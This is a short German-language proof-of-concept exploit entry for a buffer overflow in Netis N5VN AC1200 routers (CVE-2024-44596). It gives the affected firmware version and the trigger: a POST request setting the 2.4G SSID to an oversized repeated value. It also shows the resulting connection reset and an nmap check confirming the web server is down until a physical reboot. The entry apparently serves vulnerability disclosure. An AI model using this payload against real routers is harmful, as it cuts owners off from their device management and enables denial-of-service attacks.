
Proof-of-concept-Exploit für eine Pufferüberlauf-Sicherheitslücke (CVE-2024-44596) in Netis N5VN AC1200-Routern, der einen Denial-of-Service durch Absturz des Webservers mittels einer manipulierten POST-Anfrage verursacht.
Datum: 05.03.2024
Exploit-Autor: Van Lam Nguyen
Facebook: fb.com/vanlam1412
Hersteller-Webseite: Netis Systems
Version: Netis N5VN AC1200 V1.0.1.1742
Getestet auf: Windows
CVE : CVE-2024-44596
Es existiert eine Buffer-Overflow-Sicherheitslücke im Netis N5VN AC1200 Router, die es einem Angreifer ermöglichen kann, den auf dem Router laufenden Webserver durch Senden einer präparierten Anfrage zum Absturz zu bringen.
Um den http (Webserver) wiederherzustellen, muss ein Benutzer den Router physisch neu starten.
POST-Anfrage zur Änderung der SSID Wireless 2.4G ('ssid': 'QQ==' * 5000)
Erfolgreich: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http
Schauen Sie sich die Videodemonstration hier an

